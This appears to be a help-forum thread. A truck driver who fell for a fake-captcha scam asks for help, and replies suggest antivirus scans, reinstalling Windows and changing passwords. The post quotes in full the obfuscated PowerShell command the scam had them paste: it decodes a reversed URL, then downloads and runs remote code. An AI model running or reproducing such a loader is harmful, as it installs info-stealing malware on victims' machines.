I recently fell for a fake captcha scam for the first time and I'm really worried. The scam was linked to a supposed transportation company I was trying to work with for a trucking load. They sent me a link to complete a carrier contract, stating it could only be done on a laptop or PC. After I pasted some text into the Run command, I saw a PowerShell program launch, which freaked me out. I quickly disconnected my laptop from the internet. I don't have much personal info on there, just some Facebook login. Can anyone tell me if I'm safe or what I should do next? I want to check for anything that might have been installed or delete any malware. Here's the PowerShell command I executed: `PowerShell.exe -nop -ep bypass - c Su='xedni/niam/baltia/cc.trans//:sptth;iex (irm (-join $u[-1..-($u.Length)]))`
5 Answers
Try running an antivirus scan first. It might help you identify or remove the malware without needing a complete reinstall.
Seriously, you need to reinstall Windows and change all your passwords. If the virus executed, it can potentially do a lot of damage.
Once you executed that command, it likely ran instantly. Your system is compromised. Why can’t you just reinstall the OS?
I can’t reinstall it, but could restoring Windows to an earlier date work to get rid of whatever is on here?
That PowerShell command is reversed—it starts with a backward URL. This is a known trick. The site was registered recently, so it’s likely a fake site meant to steal info. Unfortunately, without knowing exactly what files were downloaded or ran, it’s tricky to provide specific advice.
This is wild because the captcha link came from what I thought was a reliable company! The load board I use sent me to them and they told me the setup had to be done on a PC, so I didn't think twice.
You’ve likely downloaded an info stealer. Best bet is to wipe your OS entirely and change all your passwords, especially for Facebook. These kinds of scams happen all the time, and a local system script can't verify you're human. Just remember: if it looks off, it probably is!
I changed my Facebook password and signed out of all devices. I really can’t reinstall Windows since I have specific offline programs that are hard to replace. If my laptop is mostly offline now, can this malware still do anything?
Reinstalling isn’t an option. Is there no way to check for what was installed or fix this without a full reinstall?